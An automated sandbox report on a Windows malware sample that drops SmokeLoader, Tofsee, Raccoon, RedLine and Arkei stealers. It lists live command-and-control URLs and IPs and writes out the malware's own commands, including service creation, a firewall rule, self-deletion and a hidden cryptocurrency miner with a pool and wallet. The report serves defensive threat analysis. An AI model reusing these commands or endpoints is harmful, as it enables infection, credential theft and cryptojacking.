Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09-01-2022 06:52
Static task
static1
Behavioral task
behavioral1
Sample
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe
Resource
win10-en-20211208
General
-
Target
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe
-
Size
297KB
-
MD5
e5ae7e2190c3b4db408bd0cfc90ba509
-
SHA1
c43d11f06bd8f8a57bbf26c88b6ae5a5a476b6ba
-
SHA256
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d
-
SHA512
c4634ad4bb3af472584a0f29efa241f3030823ff61db1d79f4fcd61ee74b5ec2dd03a698f3c02ddb344eb9272639d868222de7ce5dede1f18b9ebea635dbe242
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
10da56e7e71e97bdc1f36eb76813bbc3231de7e4
-
url4cnc
http://194.180.174.53/capibar
http://91.219.236.18/capibar
http://194.180.174.41/capibar
http://91.219.236.148/capibar
https://t.me/capibar
Extracted
redline
cheat
45.147.196.146:6213
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\whw.exe family_redline C:\Users\Admin\AppData\Roaming\whw.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4792 created 1048 4792 WerFault.exe DE7B.exe -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/4412-138-0x0000000002CD0000-0x0000000002E1A000-memory.dmp family_arkei behavioral1/memory/4412-139-0x0000000000400000-0x0000000002B80000-memory.dmp family_arkei behavioral1/memory/4272-200-0x0000000000930000-0x0000000000A90000-memory.dmp family_arkei behavioral1/memory/4272-201-0x0000000000930000-0x0000000000A90000-memory.dmp family_arkei -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
Processes:
1818.exe2B62.exe2B62.exe4208.exe4DF0.exe57D4.exetmgscynm.exe57D4.exeC8FE.exeDE7B.exeA10.exe28C5.exe36B0.exesafas2f.exewhw.exee3dwefw.exeoobeldr.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exepid process 4468 1818.exe 4352 2B62.exe 3232 2B62.exe 4412 4208.exe 4244 4DF0.exe 448 57D4.exe 2408 tmgscynm.exe 2104 57D4.exe 4272 C8FE.exe 1048 DE7B.exe 1336 A10.exe 2488 28C5.exe 3712 36B0.exe 2472 safas2f.exe 5076 whw.exe 2816 e3dwefw.exe 4512 oobeldr.exe 1844 RegHost.exe 4492 RegHost.exe 4280 RegHost.exe 4780 RegHost.exe 1632 RegHost.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Deletes itself 1 IoCs
Processes:
pid process 2612 -
Loads dropped DLL 3 IoCs
Processes:
C8FE.exepid process 4272 C8FE.exe 4272 C8FE.exe 4272 C8FE.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
safas2f.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" safas2f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe" RegHost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
Processes:
C8FE.exe36B0.exesafas2f.exebfsvc.exeRegHost.exebfsvc.exeRegHost.exebfsvc.exeRegHost.exebfsvc.exeRegHost.exebfsvc.exeRegHost.exebfsvc.exepid process 4272 C8FE.exe 3712 36B0.exe 2472 safas2f.exe 2472 safas2f.exe 3832 bfsvc.exe 3832 bfsvc.exe 1844 RegHost.exe 1844 RegHost.exe 3156 bfsvc.exe 3156 bfsvc.exe 4492 RegHost.exe 4492 RegHost.exe 3536 bfsvc.exe 3536 bfsvc.exe 4280 RegHost.exe 4280 RegHost.exe 2008 bfsvc.exe 2008 bfsvc.exe 4780 RegHost.exe 4780 RegHost.exe 2632 bfsvc.exe 2632 bfsvc.exe 1632 RegHost.exe 1632 RegHost.exe 980 bfsvc.exe 980 bfsvc.exe -
Suspicious use of SetThreadContext 17 IoCs
Processes:
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe2B62.exe57D4.exetmgscynm.exe28C5.exesafas2f.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exeRegHost.exedescription pid process target process PID 3380 set thread context of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 4352 set thread context of 3232 4352 2B62.exe 2B62.exe PID 448 set thread context of 2104 448 57D4.exe 57D4.exe PID 2408 set thread context of 4772 2408 tmgscynm.exe svchost.exe PID 2488 set thread context of 2744 2488 28C5.exe RegAsm.exe PID 2472 set thread context of 3832 2472 safas2f.exe bfsvc.exe PID 2472 set thread context of 400 2472 safas2f.exe explorer.exe PID 1844 set thread context of 3156 1844 RegHost.exe bfsvc.exe PID 1844 set thread context of 2452 1844 RegHost.exe explorer.exe PID 4492 set thread context of 3536 4492 RegHost.exe bfsvc.exe PID 4492 set thread context of 4908 4492 RegHost.exe explorer.exe PID 4280 set thread context of 2008 4280 RegHost.exe bfsvc.exe PID 4280 set thread context of 2624 4280 RegHost.exe explorer.exe PID 4780 set thread context of 2632 4780 RegHost.exe bfsvc.exe PID 4780 set thread context of 1436 4780 RegHost.exe explorer.exe PID 1632 set thread context of 980 1632 RegHost.exe bfsvc.exe PID 1632 set thread context of 1976 1632 RegHost.exe explorer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4792 1048 WerFault.exe DE7B.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1818.exe2B62.exe707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1818.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2B62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1818.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2B62.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2B62.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1818.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
C8FE.exeRegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C8FE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C8FE.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 968 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exepid process 3616 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 3616 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 2612 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2612 -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe1818.exe2B62.exepid process 3616 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 4468 1818.exe 3232 2B62.exe 2612 2612 2612 2612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
57D4.exe57D4.exeA10.exeRegAsm.exe36B0.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeDebugPrivilege 448 57D4.exe Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeDebugPrivilege 2104 57D4.exe Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeDebugPrivilege 1336 A10.exe Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeDebugPrivilege 2744 RegAsm.exe Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeDebugPrivilege 3712 36B0.exe Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeShutdownPrivilege 2612 Token: SeCreatePagefilePrivilege 2612 Token: SeRestorePrivilege 4792 WerFault.exe Token: SeBackupPrivilege 4792 WerFault.exe Token: SeDebugPrivilege 4792 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe2B62.exe4DF0.exe57D4.exetmgscynm.exedescription pid process target process PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 3380 wrote to memory of 3616 3380 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe 707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe PID 2612 wrote to memory of 4468 2612 1818.exe PID 2612 wrote to memory of 4468 2612 1818.exe PID 2612 wrote to memory of 4468 2612 1818.exe PID 2612 wrote to memory of 4352 2612 2B62.exe PID 2612 wrote to memory of 4352 2612 2B62.exe PID 2612 wrote to memory of 4352 2612 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 4352 wrote to memory of 3232 4352 2B62.exe 2B62.exe PID 2612 wrote to memory of 4412 2612 4208.exe PID 2612 wrote to memory of 4412 2612 4208.exe PID 2612 wrote to memory of 4412 2612 4208.exe PID 2612 wrote to memory of 4244 2612 4DF0.exe PID 2612 wrote to memory of 4244 2612 4DF0.exe PID 2612 wrote to memory of 4244 2612 4DF0.exe PID 2612 wrote to memory of 448 2612 57D4.exe PID 2612 wrote to memory of 448 2612 57D4.exe PID 2612 wrote to memory of 448 2612 57D4.exe PID 4244 wrote to memory of 940 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 940 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 940 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 1176 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 1176 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 1176 4244 4DF0.exe cmd.exe PID 4244 wrote to memory of 1492 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 1492 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 1492 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 1816 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 1816 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 1816 4244 4DF0.exe sc.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 4244 wrote to memory of 2212 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 2212 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 2212 4244 4DF0.exe sc.exe PID 4244 wrote to memory of 4260 4244 4DF0.exe netsh.exe PID 4244 wrote to memory of 4260 4244 4DF0.exe netsh.exe PID 4244 wrote to memory of 4260 4244 4DF0.exe netsh.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 448 wrote to memory of 2104 448 57D4.exe 57D4.exe PID 2408 wrote to memory of 4772 2408 tmgscynm.exe svchost.exe PID 2408 wrote to memory of 4772 2408 tmgscynm.exe svchost.exe PID 2408 wrote to memory of 4772 2408 tmgscynm.exe svchost.exe PID 2408 wrote to memory of 4772 2408 tmgscynm.exe svchost.exe PID 2408 wrote to memory of 4772 2408 tmgscynm.exe svchost.exe PID 2612 wrote to memory of 4556 2612 explorer.exe PID 2612 wrote to memory of 4556 2612 explorer.exe PID 2612 wrote to memory of 4556 2612 explorer.exe PID 2612 wrote to memory of 4556 2612 explorer.exe PID 2612 wrote to memory of 2828 2612 explorer.exe PID 2612 wrote to memory of 2828 2612 explorer.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe"C:\Users\Admin\AppData\Local\Temp\707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe"C:\Users\Admin\AppData\Local\Temp\707fa891013ceb08070de075bdf0d387619afbe5b097ae778fe6effd6d3c1e1d.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1818.exeC:\Users\Admin\AppData\Local\Temp\1818.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2B62.exeC:\Users\Admin\AppData\Local\Temp\2B62.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2B62.exeC:\Users\Admin\AppData\Local\Temp\2B62.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4208.exeC:\Users\Admin\AppData\Local\Temp\4208.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4DF0.exeC:\Users\Admin\AppData\Local\Temp\4DF0.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ovodwlcd\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tmgscynm.exe" C:\Windows\SysWOW64\ovodwlcd\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ovodwlcd binPath= "C:\Windows\SysWOW64\ovodwlcd\tmgscynm.exe /d\"C:\Users\Admin\AppData\Local\Temp\4DF0.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ovodwlcd "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ovodwlcd2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Users\Admin\AppData\Local\Temp\57D4.exeC:\Users\Admin\AppData\Local\Temp\57D4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\57D4.exeC:\Users\Admin\AppData\Local\Temp\57D4.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\ovodwlcd\tmgscynm.exeC:\Windows\SysWOW64\ovodwlcd\tmgscynm.exe /d"C:\Users\Admin\AppData\Local\Temp\4DF0.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C8FE.exeC:\Users\Admin\AppData\Local\Temp\C8FE.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C8FE.exe" & exit2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\DE7B.exeC:\Users\Admin\AppData\Local\Temp\DE7B.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 11842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\A10.exeC:\Users\Admin\AppData\Local\Temp\A10.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\28C5.exeC:\Users\Admin\AppData\Local\Temp\28C5.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\safas2f.exe"C:\Users\Admin\AppData\Roaming\safas2f.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +5004⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +5006⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +5008⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +50010⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +50012⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"13⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\bfsvc.exeC:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobrishe_update -cclock +500 -cvddc +50014⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"14⤵
-
C:\Users\Admin\AppData\Roaming\whw.exe"C:\Users\Admin\AppData\Roaming\whw.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\e3dwefw.exe"C:\Users\Admin\AppData\Roaming\e3dwefw.exe"3⤵
- Executes dropped EXE
